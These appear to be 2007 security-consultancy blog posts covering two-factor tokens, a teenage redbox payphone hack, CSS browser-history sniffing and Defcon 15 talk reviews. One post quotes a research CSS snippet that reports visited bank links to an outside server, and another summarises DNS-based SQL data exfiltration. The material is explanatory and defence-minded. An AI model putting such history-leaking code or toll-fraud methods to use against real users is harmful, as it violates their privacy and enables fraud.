As a security consultant with exposure to many large enterprises I admit I’m biased to RSA SecurID tokens. During penetration tests, our company has cracked tens of thousands of passwords. When I’m standing in front of a customer explaining why their password policies failed, they want to believe that changing this policy will help them. Secretly I know that humans will defeat the spirit of any password policy and that the best approach is to take the responsibility of password composition away from the end user. (When you stare at thousands of clear text passwords you develop a cynicism.)

August2007, you’ve been a good password, but it’s time I move on to owning enterprises with September2007.

The other day a friend asked me if there are any other products like SecurID he should be evaluating for his company as part of their plan to introduce two-factor authentication. Apart from SecurID the only other device that left me thinking “Hey this thing works” is Vasco’s Digipass. Any two factor system worth its weight in salt should provide authentication hooks to the popular services. If you plan to use the solution with custom web applications, you may need to dig a little deeper…maybe a lot deeper. Most solutions have hook-in APIs, but it takes some effort to piece it all together.

If you are evaluating two factor authentication devices make a list of the top services you need authentication for:

• Network devices
• Windows authentication
• Unix authentication
• VPN users
• Wireless user authentication

If a solution can cover 80% of your authentication needs and is cost effective, go with it. 80% coverage is 80% better than letting humans pick passwords; chances are with a little effort and creativity you can put something together to rein in the residual 20%. If you don’t have a two-factor solution, evaluate Vasco with the others.

-higB

I have a few big boxes of computer crap that I haven’t been able to part with. (because you never know when a ZIP drive will come in handy) The other night I was rummaging through one of these boxes and stumbled upon my Radioshack pocket tone dialer modified with a 6.5536mhz crystal. The memory floodgates opened and I reminisced about the days of BBSes, Tradewars 2002, ANSI art packs, The Jolly Roger’s cookbook (remember thermite? good times), and countless phreaking texts. I got my initial fix via 1200 baud. After mowing lawns for a summer I was able to hook up the leet 2400 US Robotics.

Back in high school I was quite the ladies man. I had an 85meg hard drive and leech status on all the local bulletin boards. After girls found out I had an SVGA monitor, sound blaster 16, and a 1x CD-ROM, they all wanted me. I used to think it was because I could draw boobs on my TI-85 graphing calculator but it the real reason for the XX chromosome attention was my crazy mad-ill tight soldering skillz.

Just like all teenage boys growing up I had an unhealthy infatuation with the phone company. (that’s normal right?) I read on a BBS text about making free phone calls from pay phones by simulating the sounds that are transmitted when coins are dropped in. (more about redboxes and phreaking here) So with a soldering iron, a 6.5336mhz crystal, and a radio shack 43-141 pocket tone dialer I went to work and built a working redbox.

After spending 30 dollars in parts I couldn’t wait to defraud PacBell of 25 cents. I remember the nervous feeling I had riding my bike over to a local church try out my new babe-magnet redbox.

There was one small problem with my plan, for some reason, I didn’t have any friends outside of my area code to call.

Enjoy the video I posted on youtube: http://www.youtube.com/watch?v=AXZMgHKhefk

–higB

For years, about the only bookmarks in my browser that I think would count as ’scary’ would have been the links for Bonsai Kittens and anything Evil Dead related. But a while back a new one was added to the list and I find I can’t keep myself from going back to it every few weeks. It seemed appropriate again to bring up in light of some of the Blackhat talks. While it has a pretty innocuous name, the page never fails to make my jaw drop and my heart start pounding louder. If think you are strong enough, and have a clean pair of underwear within reach, surf over to  http://www.browser-recon.info

For those of you with weak bladders, let me quickly explain what the site does. Their page contains code that will compare a number of popular sites to determine which ones of them you have visited in the past, then dynamically show you a graphic based on those results. No clicking on a security pop up required. No strange browser configuration needed. Just some cleaver CSS checking at basically works like a human looking at a list of links to see which ones are blue (never been to before) or which ones are purple (visited links). While the thought of this keeps me up at night, I’m sure this has got to be the wet dream of numerous spammers and phishers. Talk about target marketing. Think anyone has figured out a way to data mine these results and done some crazy profiling?

And for that scary “not quite dead yet” moment, while disabling Javascript prevents the Browser-Recon site demo from showing your bank logo, disabling JavaScript alone is not enough to solve this issue. Jeremiah Grossman was nice enough to demonstrate at Blackhat both an javascript and non-javascript version. Simply use CSS and have it try to load a few well crafted background images if it correctly recognizes visited links. Here’s a little of the code. Notice the link tag without any text to click on.

<!– Code snippet from Browser Recon.–>
<!– CSS tags that will send a message back to our webserver of where you’ve been –>
<style type=”text/css”>
#n1004:visited { background: url(https://www.indiana.edu/~phishing/browser-recon/?url=1004&session=bc66632d49ca); }
</style>

<!– A link with no text. We can check that for the “visited” property in CSS above –>
<a id=”n1004″ href=”https://ibank.amsouth.com/auth/EnrollOverview.aspx”></a>

Now I can sleep a little better knowing there’s a Firefox plug-in to block this, but look when it was originally published.  November 20, 2005. That’s quite a bit of time and this feature is not yet patched? I’ve seen a lot of people grumbling over the state of security in web browsers recently (DNS Pinning being the latest pain point). With my noscript, safehistory, uninstalled java, disabled autocomplete, version of Firefox running in a VM… I can’t say I disagree.

-b3nn

Spot the Reporter anyone? It was another good adventure out in Las Vegas last week. Obviously the best part of any con is the people who are there. It was great seeing old friends and meeting new ones. I typically ask everyone “what was the best presentation you saw?” I thought I’d turn the table and give my view on that question. I know I missed a few good ones (it would be hard to make a 9am talk in Las Vegas even if it were held in my hotel room) but here are the highlights from what I did catch.

EVDO Hacking (King Tuna) - I suspect most people found this talk more entertaining than educational and King Tuna wins for best Ricky Gervais character impersonation. I found myself cringing in my seat for his unfortunate first time presenter problems, however we walked away with two kick ass pieces of info. First, you can read files from your EVDO card with BitPim (or QPST if you have loose morals and bittorrent skillz) and the Kyocera KPC650 card’s firmware is unlocked. Tasty.

SQL out-of-band Channeling (Patrik Karlsson) -No SQL error messages being returned? No problem. I’ll just take my query results over DNS. Yup, that’s right. Over DNS (I had to double check I hadn’t just walked in the Kaminsky talk.) The short version is there’s a number of database functions that will trigger DNS lookups. Craft the “hostnames” which are really the data and request them from a domain for which the attacker owns. Check the slides cause it goes into depth on properly encoding and breaking up the data. This would get through just about any network architecture and firewall egress filter I’ve seen. Can you live without DNS lookups on your database server? Probably. Time to add that to your hardening checklists.

WEP Cloaking Exposed (Vivek Ramachandran) - Hopefully just reading the explanation of “WEP Cloaking” will make your security stomach feel like you’ve had sushi straight from the Chicago river. But if you’ve ever seen sales people, you know they can suck down anything and then try to sell it on the way out. Thankfully the Air Tight group came to the table with strong examples of how flawed this security through obscurity “WEP Cloaking” idea is. While the rest of us don’t have a tool just yet to automate the same process which was shown, it’s only a matter of time. A point to remember, they said, was that a WEP cloaking/chaffing product still won’t make a wireless WEP network PCI compliant.

Extrusion Scanning (Matt Richards) - In the past, giving a customer a report about how many different ways we could tunnel data out of their internal network would be equivalent to giving them a graph about how wet water is. The good news is we have started to see customers that are taking the steps towards decently restricting out bound connections. Hopefully the talked about eescan tool maybe a way of quickly testing this out from an internal network.

Active Reversing/Virtual World Hacking (Greg Hoglund) - I’m so not logging on to WoW if this guy is online. Caught sections of both Greg Hoglund talks and was impressed with the ideas and examples. This is not my normal cup of h4×0r tea, so I’m not sure how invovative these tools and techniques are, but I like the over all idea. The more someone can understand and trace a program without having to go break point by break point in IDA Pro sounds like a good idea to me. Lets lower the bar and get more people disassembling. Greg demo’ed some HBGary tools to quickly and easily isolate parts of a binary program that contain functions of interest.

Hack Your Car (higB) - Sure, may have a little bias here, but still was one of my favorite talks. You own the car, shouldn’t you own the computer on it? Pretty shocking to hear emissions tests often rely just on the info the computer tells it and not on actual tailpipe output. Maybe we need to take this talk to an EPA convention next.

-b3nn

Download the Presentation:

 Hack Your Car - Defcon 15

Thanks b3nn (another phishme blogger) for being the video guy. We love the video: http://www.youtube.com/watch?v=D3hyzAD0q_c

Thanks for sending me to Vegas and giving away 100+ shirts: http://intrepidusgroup.com
Great site: http://www.osecuroms.org
Thank you to the enginuity team: http://www.enginuity.org
Thank you to all the hard workers and great forums at openecu: http://www.openecu.org

Special thanks once again to Tactrix for donating the hardware giveaways. These guys rock: http://tactrix.com

Nasioc of course: http://forums.nasioc.com/forums/forumdisplay.php?f=24

Water/Alc Injection information:
http://coolingmist.com/
http://www.alcohol-injection.com/
http://www.snowperformance.net/
http://www.aquamist.co.uk/

See you at next years DefCon!

–higB